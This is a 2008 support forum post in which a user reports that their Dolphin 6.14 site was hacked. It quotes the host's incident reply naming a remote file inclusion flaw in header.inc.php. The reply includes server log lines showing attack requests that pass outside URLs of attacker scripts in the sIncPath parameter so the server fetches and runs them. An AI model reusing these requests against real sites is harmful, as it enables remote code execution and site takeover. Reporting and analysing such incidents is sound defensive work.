In reply to Dolphin 6.14 site hacked
noilien
noilien14th of November 2008
 
My site got hacked last night. it were really bad that my host have to restore it from the backup. here is the log. i am using the latest version 6.14 is there a patch for this?
Hello,

I have restored the account from our weekly backups. You were hacked because of the "Dolphin" application being exploited ( /ray/modules/global/inc/header.inc.php ). The logs of this exploit are below. You will need to update this to the latest version available, or remove the exploitable code.

189.73.227.43 see more //ray/modules/global/inc/header.inc.php?sIncPath=http://dlsowns.helloweb.eu/mailer2.txt? 200
189.73.227.43 //ray/modules/global/inc/header.inc.php?sIncPath=http://dlsowns.helloweb.eu/mailer2.txt? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 200
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 302
222.233.52.18 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.mfa.gov.bt/kethek-id.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000//kill.txt??? 200
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 302
60.50.55.46 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/kamtiez_family2000/php.txt??? 200
84.19.181.92 //ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/icon/bbs/chi.toz??? 302
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 302
84.19.181.92 //ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/icon/bbs/chi.toz??? 200
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 200
84.19.181.92 //ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/icon/bbs/chi.toz??? 200
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 200
87.118.115.69 //ray/modules/global/inc/header.inc.php?sIncPath=http://www.geocities.com/rio_rizaldy//php.txt? 200
77.46.169.164 //ray/modules/global/inc/header.inc.php?sIncPath=http://vidinas.net/includes/pbot.txt?? 200
77.46.169.164 //ray/modules/global/inc/header.inc.php?sIncPath=http://vidinas.net/includes/pbot.txt?? 200

Regards,
Jonathan C.
Network Security Administrator
PermalinkReplyPlus0 pluses
 
 
Home
Features
Pricing
Hosting
Support
About
StartDemo
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.

Blogs

Dolphin.Pro News
BoonEx News
Our Journey
Social Software World
Community Voice

Help

Support Forums
Documentation
BoonEx at GitHub
Custom Jobs
Contact Support Team

Product

Dolphin.Pro Features
Live Demo & Sandbox
Download Packages
Pricing & Order
Contact Sales Team

Company

Contact Us
About BoonEx
Privacy Policy
Terms & Conditions
© BoonEx Pty Ltd
SSL
© BoonEx
Home
Features
Pricing
Support
Hosting
About
Demo
PET:0.041836023330688